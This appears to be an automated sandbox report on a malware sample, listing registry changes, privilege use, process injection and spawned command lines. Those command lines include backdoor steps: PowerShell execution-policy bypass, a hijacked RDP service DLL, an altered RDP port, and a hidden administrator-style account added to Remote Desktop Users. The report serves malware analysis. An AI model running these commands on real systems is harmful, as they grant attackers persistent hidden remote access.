Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3904 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
PID 3904 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
PID 3904 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 3904 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 3904 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 2396 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe C:\Users\Public\Documents\Wondershare\NFWCHK.exe
PID 2396 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe C:\Users\Public\Documents\Wondershare\NFWCHK.exe
PID 2412 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Roaming\Templers\exe1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Roaming\Templers\exe1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3292 wrote to memory of 2460 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3292 wrote to memory of 2460 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2460 wrote to memory of 3972 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2460 wrote to memory of 3972 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3292 wrote to memory of 4028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3292 wrote to memory of 4028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3292 wrote to memory of 4144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3292 wrote to memory of 4144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3292 wrote to memory of 4404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3292 wrote to memory of 4404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3292 wrote to memory of 4824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3292 wrote to memory of 4824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3292 wrote to memory of 4844 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3292 wrote to memory of 4844 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3292 wrote to memory of 4864 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3292 wrote to memory of 4864 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3292 wrote to memory of 5044 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 3292 wrote to memory of 5044 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 5044 wrote to memory of 5064 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 5044 wrote to memory of 5064 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3292 wrote to memory of 5096 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3292 wrote to memory of 5096 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5096 wrote to memory of 5112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 5096 wrote to memory of 5112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 5112 wrote to memory of 3960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 5112 wrote to memory of 3960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3960 wrote to memory of 2684 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3960 wrote to memory of 2684 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3292 wrote to memory of 3700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3292 wrote to memory of 3700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3700 wrote to memory of 3612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3700 wrote to memory of 3612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 4112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3612 wrote to memory of 4112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4112 wrote to memory of 4124 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4112 wrote to memory of 4124 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4248 wrote to memory of 4308 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4248 wrote to memory of 4308 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4308 wrote to memory of 4328 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4308 wrote to memory of 4328 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4348 wrote to memory of 4216 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4348 wrote to memory of 4216 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4216 wrote to memory of 4148 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4216 wrote to memory of 4148 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4256 wrote to memory of 4000 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4256 wrote to memory of 4000 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4000 wrote to memory of 4428 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4000 wrote to memory of 4428 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4412 wrote to memory of 4532 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4412 wrote to memory of 4532 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4532 wrote to memory of 4552 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4532 wrote to memory of 4552 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4580 wrote to memory of 4620 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4580 wrote to memory of 4620 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4620 wrote to memory of 4644 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe

"C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe"

C:\Users\Admin\AppData\Roaming\Templers\exe2.exe

"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"

C:\Users\Admin\AppData\Roaming\Templers\exe1.exe

"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"

C:\Users\Public\Documents\Wondershare\NFWCHK.exe

C:\Users\Public\Documents\Wondershare\NFWCHK.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2541.tmp" "c:\Users\Admin\AppData\Local\Temp\trshuemd\CSCB76A0FB192CC42A6896CCCC69F92E773.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc WVXHFeyt /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc WVXHFeyt /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc WVXHFeyt /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

